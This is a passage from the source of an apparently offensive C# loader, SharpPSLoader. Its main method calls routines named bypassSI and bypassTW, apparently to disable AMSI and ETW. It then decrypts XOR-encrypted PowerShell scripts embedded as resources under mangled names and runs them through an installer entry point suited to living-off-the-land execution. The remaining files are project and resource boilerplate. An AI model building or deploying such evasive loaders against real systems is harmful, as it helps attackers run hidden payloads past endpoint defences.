365 |             // Are these two needed, when I'm executing through cmd + lolbas? 
366 |             psLoader.bypassSI();
367 |             psLoader.bypassTW();
368 | 
369 |             // Parse argument 
370 |             var userArg = this.Context.Parameters["p"].ToString();
371 |             string payload = userArg.Split(' ')[0];
372 |             int spaceIndex = userArg.IndexOf(' ');
373 |             string argument = userArg.Substring(spaceIndex, userArg.Length - 1);
374 | 
375 | 
376 |             string powershellPayload = "";
377 |             if (payload != null)
378 |             {
379 |                 powershellPayload = psLoader.DecryptedPSFromRsrcDict(psLoader.resourceDict, payload);
380 |             }
381 | 
382 |             psLoader.RunPowershell(powershellPayload, argument);
383 |         }
384 |     }
385 | }
386 | 
387 | 


--------------------------------------------------------------------------------
/SharpPSLoaderLibrary/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // General Information about an assembly is controlled through the following
 6 | // set of attributes. Change these attribute values to modify the information
 7 | // associated with an assembly.
 8 | [assembly: AssemblyTitle("SharpPSLoaderLibrary")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SharpPSLoaderLibrary")]
13 | [assembly: AssemblyCopyright("Copyright ©  2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components.  If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 | 
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("6d3bf3cf-1137-4609-9934-8309261f710e")]
24 | 
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | //      Major Version
28 | //      Minor Version
29 | //      Build Number
30 | //      Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/SharpPSLoaderLibrary/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
 1 | //------------------------------------------------------------------------------
 2 | // <auto-generated>
 3 | //     This code was generated by a tool.
 4 | //     Runtime Version:4.0.30319.42000
 5 | //
 6 | //     Changes to this file may cause incorrect behavior and will be lost if
 7 | //     the code is regenerated.
 8 | // </auto-generated>
 9 | //------------------------------------------------------------------------------
10 | 
11 | namespace SharpPSLoaderLibrary.Properties {
12 |     using System;
13 |     
14 |     
15 |     /// <summary>
16 |     ///   A strongly-typed resource class, for looking up localized strings, etc.
17 |     /// </summary>
18 |     // This class was auto-generated by the StronglyTypedResourceBuilder
19 |     // class via a tool like ResGen or Visual Studio.
20 |     // To add or remove a member, edit your .ResX file then rerun ResGen
21 |     // with the /str option, or rebuild your VS project.
22 |     [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
23 |     [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
24 |     [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
25 |     public class Resources {
26 |         
27 |         private static global::System.Resources.ResourceManager resourceMan;
28 |         
29 |         private static global::System.Globalization.CultureInfo resourceCulture;
30 |         
31 |         [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
32 |         internal Resources() {
33 |         }
34 |         
35 |         /// <summary>
36 |         ///   Returns the cached ResourceManager instance used by this class.
37 |         /// </summary>
38 |         [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
39 |         public static global::System.Resources.ResourceManager ResourceManager {
40 |             get {
41 |                 if (object.ReferenceEquals(resourceMan, null)) {
42 |                     global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("SharpPSLoaderLibrary.Properties.Resources", typeof(Resources).Assembly);
43 |                     resourceMan = temp;
44 |                 }
45 |                 return resourceMan;
46 |             }
47 |         }
48 |         
49 |         /// <summary>
50 |         ///   Overrides the current thread's CurrentUICulture property for all
51 |         ///   resource lookups using this strongly typed resource class.
52 |         /// </summary>
53 |         [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
54 |         public static global::System.Globalization.CultureInfo Culture {
55 |             get {
56 |                 return resourceCulture;
57 |             }
58 |             set {
59 |                 resourceCulture = value;
60 |             }
61 |         }
62 |         
63 |         /// <summary>
64 |         ///   Looks up a localized resource of type System.Byte[].
65 |         /// </summary>
66 |         public static byte[] arpPac_ps1 {
67 |             get {
68 |                 object obj = ResourceManager.GetObject("arpPac_ps1", resourceCulture);
69 |                 return ((byte[])(obj));
70 |             }
71 |         }
72 |         
73 |         /// <summary>
74 |         ///   Looks up a localized resource of type System.Byte[].
75 |         /// </summary>
76 |         public static byte[] oodhoun_ps1 {
77 |             get {
78 |                 object obj = ResourceManager.GetObject("oodhoun_ps1", resourceCulture);
79 |                 return ((byte[])(obj));
80 |             }
81 |         }
82 |     }
83 | }
84 | 


--------------------------------------------------------------------------------
/SharpPSLoaderLibrary/Properties/Resources.resx:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <root>
  3 |   <!-- 
  4 |     Microsoft ResX Schema 
  5 |     
  6 |     Version 2.0
  7 |     
  8 |     The primary goals of this format is to allow a simple XML format 
  9 |     that is mostly human readable. The generation and parsing of the 
 10 |     various data types are done through the TypeConverter classes 
 11 |     associated with the data types.
 12 |     
 13 |     Example:
 14 |     
 15 |     ... ado.net/XML headers & schema ...
 16 |     <resheader name="resmimetype">text/microsoft-resx</resheader>
 17 |     <resheader name="version">2.0</resheader>
 18 |     <resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
 19 |     <resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
 20 |     <data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
 21 |     <data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
 22 |     <data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
 23 |         <value>[base64 mime encoded serialized .NET Framework object]</value>
 24 |     </data>
 25 |     <data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
 26 |         <value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
 27 |         <comment>This is a comment</comment>
 28 |     </data>
 29 |                 
 30 |     There are any number of "resheader" rows that contain simple 
 31 |     name/value pairs.
 32 |     
 33 |     Each data row contains a name, and value. The row also contains a 
 34 |     type or mimetype. Type corresponds to a .NET class that support 
 35 |     text/value conversion through the TypeConverter architecture. 
 36 |     Classes that don't support this are serialized and stored with the 
 37 |     mimetype set.
 38 |     
 39 |     The mimetype is used for serialized objects, and tells the 
 40 |     ResXResourceReader how to depersist the object. This is currently not 
 41 |     extensible. For a given mimetype the value must be set accordingly:
 42 |     
 43 |     Note - application/x-microsoft.net.object.binary.base64 is the format 
 44 |     that the ResXResourceWriter will generate, however the reader can 
 45 |     read any of the formats listed below.
 46 |     
 47 |     mimetype: application/x-microsoft.net.object.binary.base64
 48 |     value   : The object must be serialized with 
 49 |             : System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
 50 |             : and then encoded with base64 encoding.
 51 |     
 52 |     mimetype: application/x-microsoft.net.object.soap.base64
 53 |     value   : The object must be serialized with 
 54 |             : System.Runtime.Serialization.Formatters.Soap.SoapFormatter
 55 |             : and then encoded with base64 encoding.
 56 | 
 57 |     mimetype: application/x-microsoft.net.object.bytearray.base64
 58 |     value   : The object must be serialized into a byte array 
 59 |             : using a System.ComponentModel.TypeConverter
 60 |             : and then encoded with base64 encoding.
 61 |     -->
 62 |   <xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
 63 |     <xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
 64 |     <xsd:element name="root" msdata:IsDataSet="true">
 65 |       <xsd:complexType>
 66 |         <xsd:choice maxOccurs="unbounded">
 67 |           <xsd:element name="metadata">
 68 |             <xsd:complexType>
 69 |               <xsd:sequence>
 70 |                 <xsd:element name="value" type="xsd:string" minOccurs="0" />
 71 |               </xsd:sequence>
 72 |               <xsd:attribute name="name" use="required" type="xsd:string" />
 73 |               <xsd:attribute name="type" type="xsd:string" />
 74 |               <xsd:attribute name="mimetype" type="xsd:string" />
 75 |               <xsd:attribute ref="xml:space" />
 76 |             </xsd:complexType>
 77 |           </xsd:element>
 78 |           <xsd:element name="assembly">
 79 |             <xsd:complexType>
 80 |               <xsd:attribute name="alias" type="xsd:string" />
 81 |               <xsd:attribute name="name" type="xsd:string" />
 82 |             </xsd:complexType>
 83 |           </xsd:element>
 84 |           <xsd:element name="data">
 85 |             <xsd:complexType>
 86 |               <xsd:sequence>
 87 |                 <xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
 88 |                 <xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
 89 |               </xsd:sequence>
 90 |               <xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
 91 |               <xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
 92 |               <xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
 93 |               <xsd:attribute ref="xml:space" />
 94 |             </xsd:complexType>
 95 |           </xsd:element>
 96 |           <xsd:element name="resheader">
 97 |             <xsd:complexType>
 98 |               <xsd:sequence>
 99 |                 <xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
100 |               </xsd:sequence>
101 |               <xsd:attribute name="name" type="xsd:string" use="required" />
102 |             </xsd:complexType>
103 |           </xsd:element>
104 |         </xsd:choice>
105 |       </xsd:complexType>
106 |     </xsd:element>
107 |   </xsd:schema>
108 |   <resheader name="resmimetype">
109 |     <value>text/microsoft-resx</value>
110 |   </resheader>
111 |   <resheader name="version">
112 |     <value>2.0</value>
113 |   </resheader>
114 |   <resheader name="reader">
115 |     <value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
116 |   </resheader>
117 |   <resheader name="writer">
118 |     <value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
119 |   </resheader>
120 |   <assembly alias="System.Windows.Forms" name="System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
121 |   <data name="arpPac_ps1" type="System.Resources.ResXFileRef, System.Windows.Forms">
122 |     <value>..\Resources\arpPac.ps1.xor;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
123 |   </data>
124 |   <data name="oodhoun_ps1" type="System.Resources.ResXFileRef, System.Windows.Forms">
125 |     <value>..\Resources\oodhoun.ps1.xor;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
126 |   </data>
127 | </root>


--------------------------------------------------------------------------------
/SharpPSLoaderLibrary/SharpPSLoaderLibrary.csproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
  4 |   <PropertyGroup>
  5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
  6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
  7 |     <ProjectGuid>{6D3BF3CF-1137-4609-9934-8309261F710E}</ProjectGuid>
  8 |     <OutputType>Library</OutputType>
  9 |     <AppDesignerFolder>Properties</AppDesignerFolder>
 10 |     <RootNamespace>SharpPSLoaderLibrary</RootNamespace>
 11 |     <AssemblyName>SharpPSLoaderLibrary</AssemblyName>
 12 |     <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
 13 |     <FileAlignment>512</FileAlignment>
 14 |     <Deterministic>true</Deterministic>
 15 |   </PropertyGroup>
 16 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
 17 |     <DebugSymbols>true</DebugSymbols>
 18 |     <DebugType>full</DebugType>
 19 |     <Optimize>false</Optimize>
 20 |     <OutputPath>bin\Debug\</OutputPath>
 21 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
 22 |     <ErrorReport>prompt</ErrorReport>
 23 |     <WarningLevel>4</WarningLevel>
 24 |   </PropertyGroup>
 25 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
 26 |     <DebugType>pdbonly</DebugType>
 27 |     <Optimize>true</Optimize>
 28 |     <OutputPath>bin\Release\</OutputPath>
 29 |     <DefineConstants>TRACE</DefineConstants>
 30 |     <ErrorReport>prompt</ErrorReport>
 31 |     <WarningLevel>4</WarningLevel>
 32 |   </PropertyGroup>
 33 |   <PropertyGroup>
 34 |     <DllExportIdent>83BF6E56-7979-48CB-B93F-9C465C01FDB3</DllExportIdent>
 35 |     <DllExportMetaLibName>DllExport.dll</DllExportMetaLibName>
 36 |     <DllExportNamespace>SharpPSLoaderLibrary</DllExportNamespace>
 37 |     <DllExportDDNSCecil>true</DllExportDDNSCecil>
 38 |     <DllExportSkipOnAnyCpu>false</DllExportSkipOnAnyCpu>
 39 |     <PlatformTarget>AnyCPU</PlatformTarget>
 40 |     <DllExportOrdinalsBase>1</DllExportOrdinalsBase>
 41 |     <DllExportGenExpLib>false</DllExportGenExpLib>
 42 |     <DllExportOurILAsm>false</DllExportOurILAsm>
 43 |     <DllExportSysObjRebase>false</DllExportSysObjRebase>
 44 |     <DllExportLeaveIntermediateFiles>false</DllExportLeaveIntermediateFiles>
 45 |     <DllExportTimeout>30000</DllExportTimeout>
 46 |     <DllExportPeCheck>2</DllExportPeCheck>
 47 |     <DllExportPatches>0</DllExportPatches>
 48 |     <DllExportPreProcType>0</DllExportPreProcType>
 49 |     <DllExportPostProcType>0</DllExportPostProcType>
 50 |   </PropertyGroup>
 51 |   <ItemGroup>
 52 |     <Reference Include="System" />
 53 |     <Reference Include="System.Configuration.Install" />
 54 |     <Reference Include="System.Core" />
 55 |     <Reference Include="System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
 56 |       <SpecificVersion>False</SpecificVersion>
 57 |       <HintPath>..\..\..\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll</HintPath>
 58 |     </Reference>
 59 |     <Reference Include="System.Xml.Linq" />
 60 |     <Reference Include="System.Data.DataSetExtensions" />
 61 |     <Reference Include="Microsoft.CSharp" />
 62 |     <Reference Include="System.Data" />
 63 |     <Reference Include="System.Net.Http" />
 64 |     <Reference Include="System.Xml" />
 65 |   </ItemGroup>
 66 |   <ItemGroup>
 67 |     <Compile Include="Class1.cs" />
 68 |     <Compile Include="Properties\AssemblyInfo.cs" />
 69 |     <Compile Include="Properties\Resources.Designer.cs">
 70 |       <AutoGen>True</AutoGen>
 71 |       <DesignTime>True</DesignTime>
 72 |       <DependentUpon>Resources.resx</DependentUpon>
 73 |     </Compile>
 74 |   </ItemGroup>
 75 |   <ItemGroup>
 76 |     <EmbeddedResource Include="Properties\Resources.resx">
 77 |       <Generator>PublicResXFileCodeGenerator</Generator>
 78 |       <LastGenOutput>Resources.Designer.cs</LastGenOutput>
 79 |     </EmbeddedResource>
 80 |   </ItemGroup>
 81 |   <ItemGroup>
 82 |     <None Include="packages.config" />
 83 |     <None Include="Resources\arpPac.ps1.xor" />
 84 |     <None Include="Resources\oodhoun.ps1.xor" />
 85 |   </ItemGroup>
 86 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
 87 |   <ImportGroup Label=".NET DllExport">
 88 |     <Import Project="$(SolutionDir)packages\DllExport.1.7.4\packages\DllExport.1.7.4\tools\net.r_eg.DllExport.targets" Condition="Exists($([MSBuild]::Escape('$(SolutionDir)packages\DllExport.1.7.4\packages\DllExport.1.7.4\tools\net.r_eg.DllExport.targets')))" Label="8337224c9ad9e356" />
 89 |   </ImportGroup>
 90 |   <Target Name="DllExportRestorePkg" BeforeTargets="PrepareForBuild">
 91 |     <Error Condition="!Exists('$(SolutionDir)DllExport.bat')" Text="DllExport.bat is not found. Path: '$(SolutionDir)' - https://github.com/3F/DllExport" />
 92 |     <Exec Condition="('$(DllExportModImported)' != 'true' Or !Exists('$(SolutionDir)packages\DllExport.1.7.4\packages\DllExport.1.7.4\tools\net.r_eg.DllExport.targets')) And Exists('$(SolutionDir)DllExport.bat')" Command=".\DllExport.bat  -action Restore" WorkingDirectory="$(SolutionDir)" />
 93 |     <MSBuild Condition="'$(DllExportModImported)' != 'true'" Projects="$(SolutionDir)packages\DllExport.1.7.4\packages\DllExport.1.7.4\tools\net.r_eg.DllExport.targets" Targets="DllExportMetaXBaseTarget" Properties="TargetFramework=$(TargetFramework)">
 94 |       <Output TaskParameter="TargetOutputs" PropertyName="DllExportMetaXBase" />
 95 |     </MSBuild>
 96 |     <ItemGroup>
 97 |       <Reference Include="DllExport, PublicKeyToken=8337224c9ad9e356">
 98 |         <HintPath>$(SolutionDir)packages\DllExport.1.7.4\packages\DllExport.1.7.4\gcache\$(DllExportMetaXBase)\$(DllExportNamespace)\$(DllExportMetaLibName)</HintPath>
 99 |         <Private>False</Private>
100 |         <SpecificVersion>False</SpecificVersion>
101 |       </Reference>
102 |     </ItemGroup>
103 |   </Target>
104 |   <Target Name="DllExportRPkgDynamicImport" BeforeTargets="PostBuildEvent" DependsOnTargets="GetFrameworkPaths" Condition="'$(DllExportModImported)' != 'true' And '$(DllExportRPkgDyn)' != 'false'">
105 |     <MSBuild BuildInParallel="true" UseResultsCache="true" Projects="$(MSBuildProjectFullPath)" Properties="DllExportRPkgDyn=true" Targets="Build" />
106 |   </Target>
107 | </Project>


--------------------------------------------------------------------------------
/SharpPSLoaderLibrary/packages.config:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <packages>
3 |   <package id="DllExport" version="1.7.4" targetFramework="net40" />
4 | </packages>


--------------------------------------------------------------------------------
/images/Sharppsloader-demo.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ChoiSG/SharpPSLoader/a54a584b37f8be467cba198ace9be789a4464fa2/images/Sharppsloader-demo.gif


--------------------------------------------------------------------------------